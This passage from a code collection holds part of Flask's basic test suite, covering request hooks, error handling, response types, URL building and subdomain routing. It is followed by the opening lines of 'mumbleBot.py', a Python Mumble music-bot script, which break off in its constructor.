return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash(u"Hello World")
flask.flash(u"Hello World", "error")
flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u"Hello World",
u"Hello World",
flask.Markup(u"<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", u"Hello World"),
("error", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", u"Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == u"Hello World"
assert messages[1] == flask.Markup(u"<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route('/dict')
def from_dict():
return {"foo": "bar"}, 201
assert client.get('/text').data == u'Hällo Wörld'.encode('utf-8')
assert client.get('/bytes').data == u'Hällo Wörld'.encode('utf-8')
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get('/dict')
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(",")
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ",".join(base_to_url(x) for x in value)
app.url_map.converters["list"] = ListConverter
@app.route("/<list:args>")
def index(args):
return "|".join(args)
assert client.get("/1,2,3").data == b"1|2|3"
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder='', static_url_path='')
rv = app.test_client().open('/static/index.html', method='GET')
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder='')
rv = app.test_client().open('/static/index.html', method='GET')
assert rv.status_code == 200
rv.close()
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__, subdomain_matching=True)
app.config.update(SERVER_NAME="localhost.localdomain:5000")
client = app.test_client()
@app.route("/")
def index():
return "Foo"
@app.route("/", subdomain="foo")
def subdomain():
return "Foo SubDomain"
rv = client.get("/")
assert rv.data == b"Foo"
rv = client.get("/", "http://localhost.localdomain:5000")
assert rv.data == b"Foo"
rv = client.get("/", "https://localhost.localdomain:5000")
assert rv.data == b"Foo"
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "https://localhost.localdomain")
assert rv.data == b"Foo"
try:
app.config.update(SERVER_NAME="localhost.localdomain:443")
rv = client.get("/", "https://localhost.localdomain")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "http://foo.localhost")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = client.get("/", "http://foo.localhost.localdomain")
assert rv.data == b"Foo SubDomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
assert False
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
assert False
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e)
assert ("Make sure to directly send " "your POST-request to this URL") in str(e)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(monkeypatch, host, port, server_name, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
mumbleBot.py
|
#!/usr/bin/env python3
import threading
import time
import sys
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os.path
import pymumble.pymumble_py3 as pymumble
import interface
import variables as var
import hashlib
import youtube_dl
import logging
import util
import base64
from PIL import Image
from io import BytesIO
from mutagen.easyid3 import EasyID3
import re
import media.url
import media.file
import media.playlist
import media.radio
import media.system
class MumbleBot:
def __init__(self, args):
signal.signal(signal.SIGINT, self.ctrl_caught)
self.volume = var.config.getfloat('bot', 'volume')
if db.has_option('bot', 'volume'):
self.volume = var.db.getfloat('bot', 'volume')
FORMAT = '%(asctime)s: %(message)s'
if args.verbose:
logging.basicConfig(format=FORMAT, level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
logging.debug("Starting in DEBUG loglevel")
elif args.quiet:
logging.basicConfig(format=FORMAT, level=logging.ERROR, datefmt='%Y-%m-%d %H:%M:%S')
logging.error("Starting in ERROR loglevel")
else:
logging.basicConfig(format=FORMAT, level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
logging.info("Starting in INFO loglevel")
var.playlist = []
var.user = args.user
var.music_folder = var.config.get('bot', 'music_folder')
var.is_proxified = var.config.getboolean("webinterface", "is_web_proxified")
self.exit = False
self.nb_exit = 0
self.thread = None
self.is_playing = False
if var.config.getboolean("webinterface", "enabled"):
